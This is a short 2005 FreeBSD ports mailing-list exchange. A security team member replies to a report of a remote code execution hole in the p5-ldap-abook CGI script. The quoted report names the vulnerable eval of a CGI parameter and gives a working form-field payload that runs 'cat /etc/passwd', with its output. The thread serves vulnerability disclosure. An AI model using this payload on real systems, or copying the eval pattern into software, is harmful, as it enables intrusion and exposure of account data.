FreeBSD Port: p5-ldap-abook-1.00

Simon L. Nielsen simon at
Fri Nov 18 02:17:52 PST 2005

On 2005.11.18 12:55:20 +0300, Roman Mashirov wrote:

> This cgi script contains remote code exec. In the following code (line 128):
> my $attr = eval $query->param(entry);
> script directly evaluates cgi paramter, received form client, so <input 
> type=hidden name=entry value="system 'cat /etc/passwd';"> leads to the 
> following output from script:
> # $FreeBSD: src/etc/master.passwd,v 1.39 2004/08/01 21:33:47 markm Exp $ 
> # root:*:0:0:Charlie &:/root:/bin/csh

Yay! :-/

Have you tried to exploit it and verified that this exploit works?  (I
don't see any input checking from a quick check but I cannot check
before tonight CET).

Simon L. Nielsen
FreeBSD Security Team
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 187 bytes
Desc: not available
Url :

More information about the freebsd-ports mailing list